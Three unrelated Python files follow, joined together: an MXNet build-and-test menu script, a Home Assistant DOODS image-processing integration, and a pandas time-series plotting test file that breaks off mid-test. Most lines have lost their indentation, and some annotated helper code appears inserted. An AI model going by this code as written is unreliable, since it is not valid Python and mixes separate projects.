# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
"""Tool to ease working with the build system and reproducing test results"""
import argparse
import os
import sys
from subprocess import check_call
import shlex
from ci.util import retry, remember_cwd
from typing import List
from collections import OrderedDict
import logging
import yaml
import shutil
DEFAULT_PYENV = os.environ.get('DEFAULT_PYENV', 'py3_venv')
DEFAULT_PYTHON = os.environ.get('DEFAULT_PYTHON', 'python3')
DEFAULT_CMAKE_OPTIONS = os.environ.get('DEFAULT_CMAKE_OPTIONS', 'cmake_options.yml')
class Confirm(object):
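    """Ask for confirmation on the console before running the wrapped command(s)."""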
def __init__(self, cmds):
self.cmds = cmds
def __call__(self):
resp = input("This will run the following command(s) '{}' are you sure? yes / no: ".format(self.cmds))
while True:
if resp.lower() == 'yes':
handle_commands(self.cmds)
return
elif resp.lower() == 'no':
return
else:
resp = input("Please answer yes or no: ")
class CMake(object):
def __init__(self, cmake_options_yaml=DEFAULT_CMAKE_OPTIONS, cmake_options_yaml_default='cmake/cmake_options.yml'):
if os.path.exists(cmake_options_yaml):
self.cmake_options_yaml = cmake_options_yaml
else:
self.cmake_options_yaml = cmake_options_yaml_default
logging.info('Using {} for CMake configuration'.format(self.cmake_options_yaml))
self.cmake_options = None
self.read_config()
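    # The YAML-loading helpers used by __init__ and cmake_command are not shown
    # above; a minimal sketch, assuming the options file is a flat KEY: VALUE
    # mapping, could look like this:
    def read_config(self) -> None:
        # Load the CMake options from the YAML file selected in __init__.
        assert os.path.isfile(self.cmake_options_yaml)
        with open(self.cmake_options_yaml) as f:
            self.cmake_options = yaml.safe_load(f)

    def _cmdlineflags(self) -> List[str]:
        # Turn every {OPTION: value} pair into a -DOPTION=value command-line flag.
        return ['-D{}={}'.format(opt, val) for opt, val in self.cmake_options.items()]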
def cmake_command(self) -> List[str]:
"""
:return: CMake command, as an argument list, to run given the options
"""
cmd_lst = ['cmake', '-C', 'config.cmake']
cmd_lst.extend(self._cmdlineflags())
return cmd_lst
def __call__(self, build_dir='build', generator='Ninja', build_cmd='ninja'):
logging.info("CMake / {} build in directory {}".format(
generator, os.path.abspath(build_dir)))
cmd_lst = self.cmake_command()
os.makedirs(build_dir, exist_ok=True)
with remember_cwd():
os.chdir(build_dir)
cmd_lst.extend(['-G{}'.format(generator), '..'])
logging.info('Executing: {}'.format('\t\n'.join(cmd_lst)))
check_call(cmd_lst)
logging.info('Now building')
check_call(shlex.split(build_cmd))
def create_virtualenv(venv_exe, pyexe, venv) -> None:
logging.info("Creating virtualenv in %s with python %s", venv, pyexe)
if not (venv_exe and pyexe and venv):
logging.warn("Skipping creation of virtualenv")
return
check_call([venv_exe, '-p', pyexe, venv])
def create_virtualenv_default():
create_virtualenv('virtualenv', DEFAULT_PYTHON, DEFAULT_PYENV)
logging.info("You can use the virtualenv by executing 'source %s/bin/activate'", DEFAULT_PYENV)
def provision_virtualenv(venv_path=DEFAULT_PYENV):
pip = os.path.join(venv_path, 'bin', 'pip')
if os.path.exists(pip):
# Install MXNet python bindings
check_call([pip, 'install', '--upgrade', '--force-reinstall', '-e', 'python'])
# Install test dependencies
check_call([pip, 'install', '--upgrade', '--force-reinstall', '-r',
os.path.join('ci', 'docker', 'install', 'requirements')])
else:
logging.warn("Can't find pip: '%s' not found", pip)
COMMANDS = OrderedDict([
('[Local] BUILD CMake/Ninja (using cmake_options.yaml (cp cmake/cmake_options.yml .) and edit) ({} virtualenv in "{}")'.format(DEFAULT_PYTHON, DEFAULT_PYENV),
[
CMake(),
create_virtualenv_default,
provision_virtualenv,
]),
('[Local] Python Unit tests',
"pytest -v tests/python/unittest/"
),
('[Docker] Build the MXNet binary - outputs to "lib/"',
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh build_ubuntu_cpu"),
('[Docker] Build the Jekyll website - outputs to "docs/static_site/build/html/"',
"ci/build.py --platform ubuntu_cpu_jekyll /work/runtime_functions.sh build_jekyll_docs"),
('[Docker] Build the Python API docs - outputs to "docs/python_docs/python/build/_build/html/"',
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh build_python_docs"),
('[Docker] sanity_check. Check for linting and code formatting and licenses.',
[
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh sanity_check",
]),
('[Docker] Python3 CPU unittests',
[
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh build_ubuntu_cpu_openblas",
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh unittest_ubuntu_python3_cpu",
]),
('[Docker] Python3 GPU unittests',
[
"ci/build.py --nvidiadocker --platform ubuntu_gpu /work/runtime_functions.sh build_ubuntu_gpu",
"ci/build.py --nvidiadocker --platform ubuntu_gpu /work/runtime_functions.sh unittest_ubuntu_python3_gpu",
]),
('[Docker] Python3 GPU+oneDNN unittests',
[
"ci/build.py --nvidiadocker --platform ubuntu_gpu /work/runtime_functions.sh build_ubuntu_gpu_onednn",
"ci/build.py --nvidiadocker --platform ubuntu_gpu /work/runtime_functions.sh unittest_ubuntu_python3_gpu",
]),
('[Docker] Python3 CPU oneDNN unittests',
[
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh build_ubuntu_cpu_onednn",
"ci/build.py --platform ubuntu_cpu /work/runtime_functions.sh unittest_ubuntu_python3_cpu",
]),
('[Docker] Python3 ARMv7 unittests (QEMU)',
[
"ci/build.py -p armv7",
"ci/build.py -p test.armv7 /work/runtime_functions.sh unittest_ubuntu_python3_arm"
]),
('Clean (RESET HARD) repository (Warning! erases local changes / DATA LOSS)',
Confirm("ci/docker/runtime_functions.sh clean_repo"))
])
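# Each COMMANDS entry above maps a menu label to a shell command string, a list
# of commands, or a callable; handle_commands() below dispatches on the type.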
def clip(x, mini, maxi):
return min(max(x,mini), maxi)
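# A non-numeric choice raises ValueError from int() and an out-of-range choice
# raises RuntimeError, so the retry decorator (from ci.util) can re-prompt up
# to 3 times.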
@retry((ValueError, RuntimeError), 3, delay_s = 0)
def show_menu(items: List[str], header=None) -> int:
print('\n-- MXNet dev menu --\n')
def hr():
print(''.join(['-']*30))
if header:
print(header)
hr()
for i,x in enumerate(items,1):
print('{}. {}'.format(i,x))
hr()
choice = int(input('Choose option> ')) - 1
if choice < 0 or choice >= len(items):
raise RuntimeError('Choice must be between {} and {}'.format(1, len(items)))
return choice
def handle_commands(cmds) -> None:
def handle_command(cmd):
logging.info("Executing command: %s",cmd)
check_call(shlex.split(cmd))
if type(cmds) is list:
for cmd in cmds:
handle_commands(cmd)
elif type(cmds) is str:
handle_command(cmds)
elif callable(cmds):
cmds()
else:
raise RuntimeError("handle_commands(cmds): argument should be str or List[str] but is %s", type(cmds))
def use_menu_ui(args) -> None:
command_list = list(COMMANDS.keys())
if hasattr(args, 'choice') and args.choice and args.choice[0].isdigit():
choice = int(args.choice[0]) - 1
else:
choice = show_menu(command_list, 'Available actions')
handle_commands(COMMANDS[command_list[choice]])
def build(args) -> None:
"""Build using CMake"""
venv_exe = shutil.which('virtualenv')
pyexe = shutil.which(args.pyexe)
if not venv_exe:
logging.warn("virtualenv wasn't found in path, it's recommended to install virtualenv to manage python environments")
if not pyexe:
logging.warn("Python executable %s not found in path", args.pyexe)
if args.cmake_options:
cmake = CMake(args.cmake_options)
else:
cmake = CMake()
cmake()
create_virtualenv_default()
provision_virtualenv()
def main():
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser(description="""Utility for compiling and testing MXNet easily""")
parser.set_defaults(command='use_menu_ui')
subparsers = parser.add_subparsers(help='sub-command help')
build_parser = subparsers.add_parser('build', help='build with the specified flags from file')
build_parser.add_argument('cmake_options', nargs='?',
help='File containing CMake options in YAML')
build_parser.add_argument('-v', '--venv',
type=str,
default=DEFAULT_PYENV,
help='virtualenv dir')
build_parser.add_argument('-p', '--pyexe',
type=str,
default=DEFAULT_PYTHON,
help='python executable')
build_parser.set_defaults(command='build')
menu_parser = subparsers.add_parser('menu', help='jump to menu option #')
menu_parser.set_defaults(command='use_menu_ui')
menu_parser.add_argument('choice', nargs=1)
args = parser.parse_args()
globals()[args.command](args)
return 0
if __name__ == '__main__':
sys.exit(main())
|
|
"""Support for the DOODS service."""
import io
import logging
import time
from PIL import Image, ImageDraw
from pydoods import PyDOODS
import voluptuous as vol
from homeassistant.components.image_processing import (
CONF_CONFIDENCE,
CONF_ENTITY_ID,
CONF_NAME,
CONF_SOURCE,
PLATFORM_SCHEMA,
ImageProcessingEntity,
)
from homeassistant.const import CONF_TIMEOUT
from homeassistant.core import split_entity_id
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
from homeassistant.util.pil import draw_box
_LOGGER = logging.getLogger(__name__)
ATTR_MATCHES = "matches"
ATTR_SUMMARY = "summary"
ATTR_TOTAL_MATCHES = "total_matches"
CONF_URL = "url"
CONF_AUTH_KEY = "auth_key"
CONF_DETECTOR = "detector"
CONF_LABELS = "labels"
CONF_AREA = "area"
CONF_COVERS = "covers"
CONF_TOP = "top"
CONF_BOTTOM = "bottom"
CONF_RIGHT = "right"
CONF_LEFT = "left"
CONF_FILE_OUT = "file_out"
AREA_SCHEMA = vol.Schema(
{
vol.Optional(CONF_BOTTOM, default=1): cv.small_float,
vol.Optional(CONF_LEFT, default=0): cv.small_float,
vol.Optional(CONF_RIGHT, default=1): cv.small_float,
vol.Optional(CONF_TOP, default=0): cv.small_float,
vol.Optional(CONF_COVERS, default=True): cv.boolean,
}
)
LABEL_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_AREA): AREA_SCHEMA,
vol.Optional(CONF_CONFIDENCE): vol.Range(min=0, max=100),
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_URL): cv.string,
vol.Required(CONF_DETECTOR): cv.string,
vol.Required(CONF_TIMEOUT, default=90): cv.positive_int,
vol.Optional(CONF_AUTH_KEY, default=""): cv.string,
vol.Optional(CONF_FILE_OUT, default=[]): vol.All(cv.ensure_list, [cv.template]),
vol.Optional(CONF_CONFIDENCE, default=0.0): vol.Range(min=0, max=100),
vol.Optional(CONF_LABELS, default=[]): vol.All(
cv.ensure_list, [vol.Any(cv.string, LABEL_SCHEMA)]
),
vol.Optional(CONF_AREA): AREA_SCHEMA,
}
)
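# Example configuration.yaml entry (a sketch; host, detector name and entity id
# are placeholders, not values from this file):
#
# image_processing:
#   - platform: doods
#     url: "http://doods-host:8080"
#     detector: default
#     source:
#       - entity_id: camera.front_door
#     confidence: 60
#     labels:
#       - name: person
#         confidence: 70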
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Doods client."""
url = config[CONF_URL]
auth_key = config[CONF_AUTH_KEY]
detector_name = config[CONF_DETECTOR]
timeout = config[CONF_TIMEOUT]
doods = PyDOODS(url, auth_key, timeout)
response = doods.get_detectors()
if not isinstance(response, dict):
_LOGGER.warning("Could not connect to doods server: %s", url)
return
detector = {}
for server_detector in response["detectors"]:
if server_detector["name"] == detector_name:
detector = server_detector
break
if not detector:
_LOGGER.warning(
"Detector %s is not supported by doods server %s", detector_name, url
)
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(
Doods(
hass,
camera[CONF_ENTITY_ID],
camera.get(CONF_NAME),
doods,
detector,
config,
)
)
add_entities(entities)
class Doods(ImageProcessingEntity):
"""Doods image processing service client."""
def __init__(self, hass, camera_entity, name, doods, detector, config):
"""Initialize the DOODS entity."""
self.hass = hass
self._camera_entity = camera_entity
if name:
self._name = name
else:
name = split_entity_id(camera_entity)[1]
self._name = f"Doods {name}"
self._doods = doods
self._file_out = config[CONF_FILE_OUT]
self._detector_name = detector["name"]
# detector config and aspect ratio
self._width = None
self._height = None
self._aspect = None
if detector["width"] and detector["height"]:
self._width = detector["width"]
self._height = detector["height"]
self._aspect = self._width / self._height
# the base confidence
dconfig = {}
confidence = config[CONF_CONFIDENCE]
# handle labels and specific detection areas
labels = config[CONF_LABELS]
self._label_areas = {}
self._label_covers = {}
for label in labels:
if isinstance(label, dict):
label_name = label[CONF_NAME]
if label_name not in detector["labels"] and label_name != "*":
_LOGGER.warning("Detector does not support label %s", label_name)
continue
# If label confidence is not specified, use global confidence
label_confidence = label.get(CONF_CONFIDENCE)
if not label_confidence:
label_confidence = confidence
if label_name not in dconfig or dconfig[label_name] > label_confidence:
dconfig[label_name] = label_confidence
# Label area
label_area = label.get(CONF_AREA)
self._label_areas[label_name] = [0, 0, 1, 1]
self._label_covers[label_name] = True
if label_area:
self._label_areas[label_name] = [
label_area[CONF_TOP],
label_area[CONF_LEFT],
label_area[CONF_BOTTOM],
label_area[CONF_RIGHT],
]
self._label_covers[label_name] = label_area[CONF_COVERS]
else:
if label not in detector["labels"] and label != "*":
_LOGGER.warning("Detector does not support label %s", label)
continue
self._label_areas[label] = [0, 0, 1, 1]
self._label_covers[label] = True
if label not in dconfig or dconfig[label] > confidence:
dconfig[label] = confidence
if not dconfig:
dconfig["*"] = confidence
# Handle global detection area
self._area = [0, 0, 1, 1]
self._covers = True
area_config = config.get(CONF_AREA)
if area_config:
self._area = [
area_config[CONF_TOP],
area_config[CONF_LEFT],
area_config[CONF_BOTTOM],
area_config[CONF_RIGHT],
]
self._covers = area_config[CONF_COVERS]
template.attach(hass, self._file_out)
self._dconfig = dconfig
self._matches = {}
self._total_matches = 0
self._last_image = None
@property
def camera_entity(self):
"""Return camera entity id from process pictures."""
return self._camera_entity
@property
def name(self):
"""Return the name of the image processor."""
return self._name
@property
def state(self):
"""Return the state of the entity."""
return self._total_matches
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_MATCHES: self._matches,
ATTR_SUMMARY: {
label: len(values) for label, values in self._matches.items()
},
ATTR_TOTAL_MATCHES: self._total_matches,
}
def _save_image(self, image, matches, paths):
img = Image.open(io.BytesIO(bytearray(image))).convert("RGB")
img_width, img_height = img.size
draw = ImageDraw.Draw(img)
# Draw custom global region/area
if self._area != [0, 0, 1, 1]:
draw_box(
draw, self._area, img_width, img_height, "Detection Area", (0, 255, 255)
)
for label, values in matches.items():
# Draw custom label regions/areas
if label in self._label_areas and self._label_areas[label] != [0, 0, 1, 1]:
box_label = f"{label.capitalize()} Detection Area"
draw_box(
draw,
self._label_areas[label],
img_width,
img_height,
box_label,
(0, 255, 0),
)
# Draw detected objects
for instance in values:
box_label = f'{label} {instance["score"]:.1f}%'
# Already scaled, use 1 for width and height
draw_box(
draw,
instance["box"],
img_width,
img_height,
box_label,
(255, 255, 0),
)
for path in paths:
_LOGGER.info("Saving results image to %s", path)
img.save(path)
def process_image(self, image):
"""Process the image."""
img = Image.open(io.BytesIO(bytearray(image)))
img_width, img_height = img.size
if self._aspect and abs((img_width / img_height) - self._aspect) > 0.1:
_LOGGER.debug(
"The image aspect: %s and the detector aspect: %s differ by more than 0.1",
(img_width / img_height),
self._aspect,
)
# Run detection
start = time.monotonic()
response = self._doods.detect(
image, dconfig=self._dconfig, detector_name=self._detector_name
)
_LOGGER.debug(
"doods detect: %s response: %s duration: %s",
self._dconfig,
response,
time.monotonic() - start,
)
matches = {}
total_matches = 0
if not response or "error" in response:
if "error" in response:
_LOGGER.error(response["error"])
self._matches = matches
self._total_matches = total_matches
return
for detection in response["detections"]:
score = detection["confidence"]
boxes = [
detection["top"],
detection["left"],
detection["bottom"],
detection["right"],
]
label = detection["label"]
# Exclude unlisted labels
if "*" not in self._dconfig and label not in self._dconfig:
continue
# Exclude matches outside global area definition
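# covers=True requires the detection box to lie entirely inside the area;
# covers=False only requires it to overlap the area.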
if self._covers:
if (
boxes[0] < self._area[0]
or boxes[1] < self._area[1]
or boxes[2] > self._area[2]
or boxes[3] > self._area[3]
):
continue
else:
if (
boxes[0] > self._area[2]
or boxes[1] > self._area[3]
or boxes[2] < self._area[0]
or boxes[3] < self._area[1]
):
continue
# Exclude matches outside label specific area definition
if self._label_areas.get(label):
if self._label_covers[label]:
if (
boxes[0] < self._label_areas[label][0]
or boxes[1] < self._label_areas[label][1]
or boxes[2] > self._label_areas[label][2]
or boxes[3] > self._label_areas[label][3]
):
continue
else:
if (
boxes[0] > self._label_areas[label][2]
or boxes[1] > self._label_areas[label][3]
or boxes[2] < self._label_areas[label][0]
or boxes[3] < self._label_areas[label][1]
):
continue
if label not in matches:
matches[label] = []
matches[label].append({"score": float(score), "box": boxes})
total_matches += 1
# Save Images
if total_matches and self._file_out:
paths = []
for path_template in self._file_out:
if isinstance(path_template, template.Template):
paths.append(
path_template.render(camera_entity=self._camera_entity)
)
else:
paths.append(path_template)
self._save_image(image, matches, paths)
self._matches = matches
self._total_matches = total_matches
|
|
""" Test cases for time series specific (freq conversion, etc) """
from datetime import (
date,
datetime,
time,
timedelta,
)
import pickle
import numpy as np
import pytest
from pandas._libs.tslibs import (
BaseOffset,
to_offset,
)
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
Index,
NaT,
Series,
isna,
to_datetime,
)
import pandas._testing as tm
from pandas.core.indexes.datetimes import (
DatetimeIndex,
bdate_range,
date_range,
)
from pandas.core.indexes.period import (
Period,
PeriodIndex,
period_range,
)
from pandas.core.indexes.timedeltas import timedelta_range
from pandas.tests.plotting.common import TestPlotBase
from pandas.tseries.offsets import WeekOfMonth
pytestmark = pytest.mark.slow
@td.skip_if_no_mpl
class TestTSPlot(TestPlotBase):
def setup_method(self, method):
TestPlotBase.setup_method(self, method)
self.freq = ["S", "T", "H", "D", "W", "M", "Q", "A"]
idx = [period_range("12/31/1999", freq=x, periods=100) for x in self.freq]
self.period_ser = [Series(np.random.randn(len(x)), x) for x in idx]
self.period_df = [
DataFrame(np.random.randn(len(x), 3), index=x, columns=["A", "B", "C"])
for x in idx
]
freq = ["S", "T", "H", "D", "W", "M", "Q-DEC", "A", "1B30Min"]
idx = [date_range("12/31/1999", freq=x, periods=100) for x in freq]
self.datetime_ser = [Series(np.random.randn(len(x)), x) for x in idx]
self.datetime_df = [
DataFrame(np.random.randn(len(x), 3), index=x, columns=["A", "B", "C"])
for x in idx
]
def teardown_method(self, method):
tm.close()
def test_ts_plot_with_tz(self, tz_aware_fixture):
# GH2877, GH17173, GH31205, GH31580
tz = tz_aware_fixture
index = date_range("1/1/2011", periods=2, freq="H", tz=tz)
ts = Series([188.5, 328.25], index=index)
with tm.assert_produces_warning(None):
_check_plot_works(ts.plot)
ax = ts.plot()
xdata = list(ax.get_lines())[0].get_xdata()
# Check first and last points' labels are correct
assert (xdata[0].hour, xdata[0].minute) == (0, 0)
assert (xdata[-1].hour, xdata[-1].minute) == (1, 0)
def test_fontsize_set_correctly(self):
# For issue #8765
df = DataFrame(np.random.randn(10, 9), index=range(10))
fig, ax = self.plt.subplots()
df.plot(fontsize=2, ax=ax)
for label in ax.get_xticklabels() + ax.get_yticklabels():
assert label.get_fontsize() == 2
def test_frame_inferred(self):
# inferred freq
idx = date_range("1/1/1987", freq="MS", periods=100)
idx = DatetimeIndex(idx.values, freq=None)
df = DataFrame(np.random.randn(len(idx), 3), index=idx)
_check_plot_works(df.plot)
# axes freq
idx = idx[0:40].union(idx[45:99])
df2 = DataFrame(np.random.randn(len(idx), 3), index=idx)
_check_plot_works(df2.plot)
# N > 1
idx = date_range("2008-1-1 00:15:00", freq="15T", periods=10)
idx = DatetimeIndex(idx.values, freq=None)
df = DataFrame(np.random.randn(len(idx), 3), index=idx)
_check_plot_works(df.plot)
def test_is_error_nozeroindex(self):
# GH11858
i = np.array([1, 2, 3])
a = DataFrame(i, index=i)
_check_plot_works(a.plot, xerr=a)
_check_plot_works(a.plot, yerr=a)
def test_nonnumeric_exclude(self):
idx = date_range("1/1/1987", freq="A", periods=3)
df = DataFrame({"A": ["x", "y", "z"], "B": [1, 2, 3]}, idx)
fig, ax = self.plt.subplots()
df.plot(ax=ax) # it works
assert len(ax.get_lines()) == 1 # B was plotted
self.plt.close(fig)
msg = "no numeric data to plot"
with pytest.raises(TypeError, match=msg):
df["A"].plot()
def test_tsplot(self):
_, ax = self.plt.subplots()
ts = tm.makeTimeSeries()
for s in self.period_ser:
_check_plot_works(s.plot, ax=ax)
for s in self.datetime_ser:
_check_plot_works(s.plot, ax=ax)
_, ax = self.plt.subplots()
ts.plot(style="k", ax=ax)
color = (0.0, 0.0, 0.0, 1)
assert color == ax.get_lines()[0].get_color()
def test_both_style_and_color(self):
ts = tm.makeTimeSeries()
msg = (
"Cannot pass 'style' string with a color symbol and 'color' "
"keyword argument. Please use one or the other or pass 'style' "
"without a color symbol"
)
with pytest.raises(ValueError, match=msg):
ts.plot(style="b-", color="#000099")
s = ts.reset_index(drop=True)
with pytest.raises(ValueError, match=msg):
s.plot(style="b-", color="#000099")
def test_high_freq(self):
freaks = ["ms", "us"]
for freq in freaks:
_, ax = self.plt.subplots()
rng = date_range("1/1/2012", periods=100, freq=freq)
ser = Series(np.random.randn(len(rng)), rng)
_check_plot_works(ser.plot, ax=ax)
def test_get_datevalue(self):
from pandas.plotting._matplotlib.converter import get_datevalue
assert get_datevalue(None, "D") is None
assert get_datevalue(1987, "A") == 1987
assert get_datevalue(Period(1987, "A"), "M") == Period("1987-12", "M").ordinal
assert get_datevalue("1/1/1987", "D") == Period("1987-1-1", "D").ordinal
def test_ts_plot_format_coord(self):
def check_format_of_first_point(ax, expected_string):
first_line = ax.get_lines()[0]
first_x = first_line.get_xdata()[0].ordinal
first_y = first_line.get_ydata()[0]
try:
assert expected_string == ax.format_coord(first_x, first_y)
            except ValueError:
pytest.skip(
"skipping test because issue forming test comparison GH7664"
)
annual = Series(1, index=date_range("2014-01-01", periods=3, freq="A-DEC"))
_, ax = self.plt.subplots()
annual.plot(ax=ax)
check_format_of_first_point(ax, "t = 2014 y = 1.000000")
# note this is added to the annual plot already in existence, and
# changes its freq field
daily = Series(1, index=date_range("2014-01-01", periods=3, freq="D"))
daily.plot(ax=ax)
check_format_of_first_point(ax, "t = 2014-01-01 y = 1.000000")
tm.close()
def test_line_plot_period_series(self):
for s in self.period_ser:
_check_plot_works(s.plot, s.index.freq)
@pytest.mark.parametrize(
"frqncy", ["1S", "3S", "5T", "7H", "4D", "8W", "11M", "3A"]
)
def test_line_plot_period_mlt_series(self, frqncy):
# test period index line plot for series with multiples (`mlt`) of the
# frequency (`frqncy`) rule code. tests resolution of issue #14763
idx = period_range("12/31/1999", freq=frqncy, periods=100)
s = Series(np.random.randn(len(idx)), idx)
_check_plot_works(s.plot, s.index.freq.rule_code)
def test_line_plot_datetime_series(self):
for s in self.datetime_ser:
_check_plot_works(s.plot, s.index.freq.rule_code)
def test_line_plot_period_frame(self):
for df in self.period_df:
_check_plot_works(df.plot, df.index.freq)
@pytest.mark.parametrize(
"frqncy", ["1S", "3S", "5T", "7H", "4D", "8W", "11M", "3A"]
)
def test_line_plot_period_mlt_frame(self, frqncy):
# test period index line plot for DataFrames with multiples (`mlt`)
# of the frequency (`frqncy`) rule code. tests resolution of issue
# #14763
idx = period_range("12/31/1999", freq=frqncy, periods=100)
df = DataFrame(np.random.randn(len(idx), 3), index=idx, columns=["A", "B", "C"])
freq = df.index.asfreq(df.index.freq.rule_code).freq
_check_plot_works(df.plot, freq)
def test_line_plot_datetime_frame(self):
for df in self.datetime_df:
freq = df.index.to_period(df.index.freq.rule_code).freq
_check_plot_works(df.plot, freq)
def test_line_plot_inferred_freq(self):
for ser in self.datetime_ser:
ser = Series(ser.values, Index(np.asarray(ser.index)))
_check_plot_works(ser.plot, ser.index.inferred_freq)
ser = ser[[0, 3, 5, 6]]
_check_plot_works(ser.plot)
def test_fake_inferred_business(self):
_, ax = self.plt.subplots()
rng = date_range("2001-1-1", "2001-1-10")
ts = Series(range(len(rng)), index=rng)
ts = ts[:3].append(ts[5:])
ts.plot(ax=ax)
assert not hasattr(ax, "freq")
def test_plot_offset_freq(self):
ser = tm.makeTimeSeries()
_check_plot_works(ser.plot)
dr = date_range(ser.index[0], freq="BQS", periods=10)
ser = Series(np.random.randn(len(dr)), index=dr)
_check_plot_works(ser.plot)
def test_plot_multiple_inferred_freq(self):
dr = Index([datetime(2000, 1, 1), datetime(2000, 1, 6), datetime(2000, 1, 11)])
ser = Series(np.random.randn(len(dr)), index=dr)
_check_plot_works(ser.plot)
def test_uhf(self):
import pandas.plotting._matplotlib.converter as conv
idx = date_range("2012-6-22 21:59:51.960928", freq="L", periods=500)
df = DataFrame(np.random.randn(len(idx), 2), index=idx)
_, ax = self.plt.subplots()
df.plot(ax=ax)
axis = ax.get_xaxis()
tlocs = axis.get_ticklocs()
tlabels = axis.get_ticklabels()
for loc, label in zip(tlocs, tlabels):
xp = conv._from_ordinal(loc).strftime("%H:%M:%S.%f")
rs = str(label.get_text())
if len(rs):
assert xp == rs
def test_irreg_hf(self):
idx = date_range("2012-6-22 21:59:51", freq="S", periods=100)
df = DataFrame(np.random.randn(len(idx), 2), index=idx)
irreg = df.iloc[[0, 1, 3, 4]]
_, ax = self.plt.subplots()
irreg.plot(ax=ax)
diffs = Series(ax.get_lines()[0].get_xydata()[:, 0]).diff()
sec = 1.0 / 24 / 60 / 60
assert (np.fabs(diffs[1:] - [sec, sec * 2, sec]) < 1e-8).all()
_, ax = self.plt.subplots()
df2 = df.copy()
df2.index = df.index.astype(object)
df2.plot(ax=ax)
diffs = Series(ax.get_lines()[0].get_xydata()[:, 0]).diff()
assert (np.fabs(diffs[1:] - sec) < 1e-8).all()
def test_irregular_datetime64_repr_bug(self):
ser = tm.makeTimeSeries()
ser = ser[[0, 1, 2, 7]]
_, ax = self.plt.subplots()
ret = ser.plot(ax=ax)
assert ret is not None
for rs, xp in zip(ax.get_lines()[0].get_xdata(), ser.index):
assert rs == xp
def test_business_freq(self):
bts = tm.makePeriodSeries()
_, ax = self.plt.subplots()
bts.plot(ax=ax)
assert ax.get_lines()[0].get_xydata()[0, 0] == bts.index[0].ordinal
idx = ax.get_lines()[0].get_xdata()
assert PeriodIndex(data=idx).freqstr == "B"
def test_business_freq_convert(self):
bts = tm.makeTimeSeries(300).asfreq("BM")
ts = bts.to_period("M")
_, ax = self.plt.subplots()
bts.plot(ax=ax)
assert ax.get_lines()[0].get_xydata()[0, 0] == ts.index[0].ordinal
idx = ax.get_lines()[0].get_xdata()
assert PeriodIndex(data=idx).freqstr == "M"
def test_freq_with_no_period_alias(self):
# GH34487
freq = WeekOfMonth()
bts = tm.makeTimeSeries(5).asfreq(freq)
_, ax = self.plt.subplots()
bts.plot(ax=ax)
idx = ax.get_lines()[0].get_xdata()
msg = "freq not specified and cannot be inferred"
with pytest.raises(ValueError, match=msg):
PeriodIndex(data=idx)
def test_nonzero_base(self):
# GH2571
idx = date_range("2012-12-20", periods=24, freq="H") + timedelta(minutes=30)
df = DataFrame(np.arange(24), index=idx)
_, ax = self.plt.subplots()
df.plot(ax=ax)
rs = ax.get_lines()[0].get_xdata()
assert not Index(rs).is_normalized
def test_dataframe(self):
bts = DataFrame({"a": tm.makeTimeSeries()})
_, ax = self.plt.subplots()
bts.plot(ax=ax)
idx = ax.get_lines()[0].get_xdata()
tm.assert_index_equal(bts.index.to_period(), PeriodIndex(idx))
def test_axis_limits(self):
def _test(ax):
xlim = ax.get_xlim()
ax.set_xlim(xlim[0] - 5, xlim[1] + 10)
result = ax.get_xlim()
assert result[0] == xlim[0] - 5
assert result[1] == xlim[1] + 10
# string
expected = (Period("1/1/2000", ax.freq), Period("4/1/2000", ax.freq))
ax.set_xlim("1/1/2000", "4/1/2000")
result = ax.get_xlim()
assert int(result[0]) == expected[0].ordinal
assert int(result[1]) == expected[1].ordinal
# datetime
expected = (Period("1/1/2000", ax.freq), Period("4/1/2000", ax.freq))
ax.set_xlim(datetime(2000, 1, 1), datetime(2000, 4, 1))
result = ax.get_xlim()
assert int(result[0]) == expected[0].ordinal
assert int(result[1]) == expected[1].ordinal
fig = ax.get_figure()
self.plt.close(fig)
ser = tm.makeTimeSeries()
_, ax = self.plt.subplots()
ser.plot(ax=ax)
_test(ax)
_, ax = self.plt.subplots()
df = DataFrame({"a": ser, "b": ser + 1})
df.plot(ax=ax)
_test(ax)
df = DataFrame({"a": ser, "b": ser + 1})
axes = df.plot(subplots=True)
for ax in axes:
_test(ax)
def test_get_finder(self):
import pandas.plotting._matplotlib.converter as conv
assert conv.get_finder(to_offset("B")) == conv._daily_finder
assert conv.get_finder(to_offset("D")) == conv._daily_finder
assert conv.get_finder(to_offset("M")) == conv._monthly_finder
assert conv.get_finder(to_offset("Q")) == conv._quarterly_finder
assert conv.get_finder(to_offset("A")) == conv._annual_finder
assert conv.get_finder(to_offset("W")) == conv._daily_finder
def test_finder_daily(self):
day_lst = [10, 40, 252, 400, 950, 2750, 10000]
xpl1 = xpl2 = [Period("1999-1-1", freq="B").ordinal] * len(day_lst)
rs1 = []
rs2 = []
for n in day_lst:
rng = bdate_range("1999-1-1", periods=n)
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs1.append(xaxis.get_majorticklocs()[0])
vmin, vmax = ax.get_xlim()
ax.set_xlim(vmin + 0.9, vmax)
rs2.append(xaxis.get_majorticklocs()[0])
self.plt.close(ax.get_figure())
assert rs1 == xpl1
assert rs2 == xpl2
def test_finder_quarterly(self):
yrs = [3.5, 11]
xpl1 = xpl2 = [Period("1988Q1").ordinal] * len(yrs)
rs1 = []
rs2 = []
for n in yrs:
rng = period_range("1987Q2", periods=int(n * 4), freq="Q")
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs1.append(xaxis.get_majorticklocs()[0])
(vmin, vmax) = ax.get_xlim()
ax.set_xlim(vmin + 0.9, vmax)
